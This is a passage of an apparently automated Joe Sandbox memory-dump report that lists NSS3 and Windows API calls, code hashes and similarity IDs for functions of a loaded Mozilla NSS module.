
Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 70b2798c7b3da0dcc1b03603bf7cfe407b7b0f274230b875e2b3429accb0b2a2
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: E92126B1D003564BEB10CF549D44BAA3B74AF9930CF1A0369DD085B742F7B1E6C882D2

Function 6CA769B0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(6CA76AB7,0000000C,00000001,00000000,?,?,6CA76AB7,?,00000000,?), ref: 6CA769CE

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

SEC_ASN1EncodeItem_Util.NSS3(6CA76AB7,0000001C,00000004,?,00000001,00000000), ref: 6CA76A06
SEC_ASN1EncodeItem_Util.NSS3(6CA76AB7,?,00000000,?,00000001,00000000,?,?,6CA76AB7,?,00000000,?), ref: 6CA76A2D
PR_SetError.NSS3(FFFFE005,00000000,00000001,00000000,?,?,6CA76AB7,?,00000000,?), ref: 6CA76A42

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$ArenaEncodeItem_Value$Alloc_AllocateCriticalEnterErrorSectionUnlock
String ID:
API String ID: 4031546487-0
Opcode ID: a09db238fa1bc9e03ebdd52cb76a18484f526ae52b8e130fcb6c2c23cf9d356a
Instruction ID: 6bed470eeca4ea43a84e8f5fbd700baaf62ed7976a229ef70eb08be0e33018a9
Opcode Fuzzy Hash: a09db238fa1bc9e03ebdd52cb76a18484f526ae52b8e130fcb6c2c23cf9d356a
Instruction Fuzzy Hash: 2A11BF79A40209AFEB208E69CC80B5677BCFB4065CF188529EA19C3F01F331E88486B0

Function 6CA9ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CA9ACC2

Part of subcall function 6CA72F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CA72F0A
Part of subcall function 6CA72F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA72F1D

Part of subcall function 6CA72AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CA70A1B,00000000), ref: 6CA72AF0
Part of subcall function 6CA72AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA72B11

CERT_DestroyCertList.NSS3(00000000), ref: 6CA9AD5E

Part of subcall function 6CAB57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CA7B41E,00000000,00000000,?,00000000,?,6CA7B41E,00000000,00000000,00000001,?), ref: 6CAB57E0
Part of subcall function 6CAB57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CAB5843

CERT_DestroyCertList.NSS3(?), ref: 6CA9AD36

Part of subcall function 6CA72F50: CERT_DestroyCertificate.NSS3(?), ref: 6CA72F65
Part of subcall function 6CA72F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA72F83

free.MOZGLUE(?), ref: 6CA9AD4F

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 9fa4107035711ed386494c26da0219be3229c2df79d66b0507eb6290b3debf7e
Instruction ID: ac386f75969c9415c30200faa8c687e3ecca829b09f75c8567596b4bafe7fdd3
Opcode Fuzzy Hash: 9fa4107035711ed386494c26da0219be3229c2df79d66b0507eb6290b3debf7e
Instruction Fuzzy Hash: A321C3B5D102188BEF10DF64DA065EEB7F5EF05208F094169D809BB610FB31AE99CBE1

Function 6CAC3C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CAC3C9E
EnterCriticalSection.KERNEL32(?), ref: 6CAC3CAE
PR_Unlock.NSS3(?), ref: 6CAC3CEA
PR_SetError.NSS3(00000000,00000000), ref: 6CAC3D02

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 365a8315213e8ee64a80695256c5b94ec4eb9cc586545447c3d89d638f71885d
Instruction ID: 7619a8a8fa3c70a5f8ef51d4830bf2df173ddc0979a9e6f2f8758d9a01b2614e
Opcode Fuzzy Hash: 365a8315213e8ee64a80695256c5b94ec4eb9cc586545447c3d89d638f71885d
Instruction Fuzzy Hash: 0B11B179A05214AFDB00AF24DC48ADA3778EF09368F194464FD089B712E730ED94CBE1

Function 6CACECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CACF0AD,6CACF150,?,6CACF150,?,?,?), ref: 6CACECBA

Part of subcall function 6CAD0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA787ED,00000800,6CA6EF74,00000000), ref: 6CAD1000
Part of subcall function 6CAD0FF0: PR_NewLock.NSS3(?,00000800,6CA6EF74,00000000), ref: 6CAD1016
Part of subcall function 6CAD0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA787ED,00000008,?,00000800,6CA6EF74,00000000), ref: 6CAD102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CACECD1

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CACED02

Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CACED5A

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 971a00aa462532e26a7ed9a531a0f60f7f4b692a3676c5750d89d8cb1fbc24be
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 7321D1B1A017429BE700CF25DA45B62B7E4BFA4308F26C229E81C87A61EB70E5D4C6D1

Function 6CA9C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 6CA9C890

Part of subcall function 6CA98F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CA98FAF
Part of subcall function 6CA98F70: PR_Now.NSS3(?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CA98FD1
Part of subcall function 6CA98F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CA98FFA
Part of subcall function 6CA98F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CA99013
Part of subcall function 6CA98F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CA99042
Part of subcall function 6CA98F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CA9905A
Part of subcall function 6CA98F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CA99073
Part of subcall function 6CA98F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CA8DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CA99111

PR_GetCurrentThread.NSS3 ref: 6CA9C8B2

Part of subcall function 6CB39BF0: TlsGetValue.KERNEL32(?,?,?,6CB80A75), ref: 6CB39C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CA9C8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA9C8EB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: ed524631fea709e859a11178dfd49dc41fbd59fbecb2ab367b6cba8133d541df
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: 3601E566E216207BD70029B96C86ABF3AE99B4525CF0C4135FC08E7B01F761889D82E2

Function 6CAFEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CAE7FFA,?,6CAE9767,?,8B7874C0,0000A48E), ref: 6CAFEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CAE7FFA,?,6CAE9767,?,8B7874C0,0000A48E), ref: 6CAFEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6CAE7FFA,?,6CAE9767,?,8B7874C0,0000A48E), ref: 6CAFEE14

Part of subcall function 6CAD0BE0: malloc.MOZGLUE(6CAC8D2D,?,00000000,?), ref: 6CAD0BF8
Part of subcall function 6CAD0BE0: TlsGetValue.KERNEL32(6CAC8D2D,?,00000000,?), ref: 6CAD0C15

memcpy.VCRUNTIME140(?,?,6CAE9767,00000000,00000000,6CAE7FFA,?,6CAE9767,?,8B7874C0,0000A48E), ref: 6CAFEE33

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: f44bbde4d3027cbe35eeff6f3122840c761636ea5473c2f0f7890abb84bddfb5
Instruction ID: 751ded39eb407f9df179e7f5d3ac2a5e026a3aa21cfac9178608abb5c5ba903f
Opcode Fuzzy Hash: f44bbde4d3027cbe35eeff6f3122840c761636ea5473c2f0f7890abb84bddfb5
Instruction Fuzzy Hash: 5A11A3B5A04706BBEB109E65EC84B06B3A8EB0435CF244531F929C3A00E330F4A587E1

Function 6CA7DFA0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CA906A0: TlsGetValue.KERNEL32 ref: 6CA906C2
Part of subcall function 6CA906A0: EnterCriticalSection.KERNEL32(?), ref: 6CA906D6
Part of subcall function 6CA906A0: PR_Unlock.NSS3 ref: 6CA906EB

CERT_NewCertList.NSS3 ref: 6CA7DFBF
CERT_AddCertToListTail.NSS3(00000000,?), ref: 6CA7DFDB
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CA7DFFA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA7E029

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
String ID:
API String ID: 3183882470-0
Opcode ID: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction ID: a84fd72a9cf631fb4ab85a789b9a96cb8b56fb4ba1cd03ab570427458bb57c71
Opcode Fuzzy Hash: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction Fuzzy Hash: B3110C79A44205AFDB301EB95C48BEF76ACBB4035CF080538E91887B00E776C95696F1

Function 6CAE08D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CAE09B3,0000001A,?), ref: 6CAE08E9

Part of subcall function 6CAD0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD08B4

SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CAE08FD

Part of subcall function 6CACFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAC8D2D,?,00000000,?), ref: 6CACFB85
Part of subcall function 6CACFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CACFBB1

SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6CAE0939
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAE0953

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
String ID:
API String ID: 2572351645-0
Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction ID: 4de48f415d25a87705427795a83f700edc30040ff6b9049f98e8479a57effb86
Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction Fuzzy Hash: 910104B1A0124A2BFB049EB59C20B6737989F48318F044039EC1AC6F01EF21E498AAD1

Function 6CA98DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA98DE7
EnterCriticalSection.KERNEL32 ref: 6CA98DFC
PR_Unlock.NSS3 ref: 6CA98E2D
PR_SetError.NSS3 ref: 6CA98E49

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 0b194f7ac8035feeb4c6f7ddf0446a8af60b68437b8b86b965580e75996e9efc
Instruction ID: f71d0ac13d50a962dbe74e811a3701cb1fe3780ac85895de9742b4b1e067c9d3
Opcode Fuzzy Hash: 0b194f7ac8035feeb4c6f7ddf0446a8af60b68437b8b86b965580e75996e9efc
Instruction Fuzzy Hash: B2118C75A19A109BDB00AF78D5882AABBF4FF05314F054929EC8897B00E730E894CBC2

Function 6CB1AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CB05F17,?,?,?,?,?,?,?,?,6CB0AAD4), ref: 6CB1AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CB05F17,?,?,?,?,?,?,?,?,6CB0AAD4), ref: 6CB1ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CB0AAD4), ref: 6CB1ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CB0AAD4), ref: 6CB1ACDB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: eefc591f52dce772f4224e4552b51d951799c1de325f4dd00247c9b0403e77c2
Instruction ID: 660af6207360d7e3169b12293a781a38ca3df94dd5b4fabd067e5c41a64ccee4
Opcode Fuzzy Hash: eefc591f52dce772f4224e4552b51d951799c1de325f4dd00247c9b0403e77c2
Instruction Fuzzy Hash: D2014CB1601B419BEB50DF2ADD08753B7E8FF04699B104839E85AD3E00E731F559CB91

Function 6CA81DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6CA81DFB

Part of subcall function 6CA795B0: TlsGetValue.KERNEL32(00000000,?,6CA900D2,00000000), ref: 6CA795D2
Part of subcall function 6CA795B0: EnterCriticalSection.KERNEL32(?,?,?,6CA900D2,00000000), ref: 6CA795E7
Part of subcall function 6CA795B0: PR_Unlock.NSS3(?,?,?,?,6CA900D2,00000000), ref: 6CA79605

PR_EnterMonitor.NSS3 ref: 6CA81E09

Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390AB
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390C9
Part of subcall function 6CB39090: EnterCriticalSection.KERNEL32 ref: 6CB390E5
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB39116
Part of subcall function 6CB39090: LeaveCriticalSection.KERNEL32 ref: 6CB3913F

Part of subcall function 6CA7E190: PR_EnterMonitor.NSS3(?,?,6CA7E175), ref: 6CA7E19C
Part of subcall function 6CA7E190: PR_EnterMonitor.NSS3(6CA7E175), ref: 6CA7E1AA
Part of subcall function 6CA7E190: PR_ExitMonitor.NSS3 ref: 6CA7E208
Part of subcall function 6CA7E190: PL_HashTableRemove.NSS3(?), ref: 6CA7E219
Part of subcall function 6CA7E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA7E231
Part of subcall function 6CA7E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA7E249
Part of subcall function 6CA7E190: PR_ExitMonitor.NSS3 ref: 6CA7E257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA81E37
PR_ExitMonitor.NSS3 ref: 6CA81E4A

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: 2c7cde3ce6e416a0f1be5d73e98036b35eb05254a0f03ef56e3b7b7327a6cef8
Instruction ID: d1762d9f4533e6547da8f290b0c02983fb6913b492ce429410f844e76ac700f7
Opcode Fuzzy Hash: 2c7cde3ce6e416a0f1be5d73e98036b35eb05254a0f03ef56e3b7b7327a6cef8
Instruction Fuzzy Hash: 1F01A771B5119097EB105A65EC40F767775AB4174CF140131EA3897F51E731EC58CBE1

Function 6CA81D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA81D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CA81D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6CA81D9C
free.MOZGLUE(00000000), ref: 6CA81DB8

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
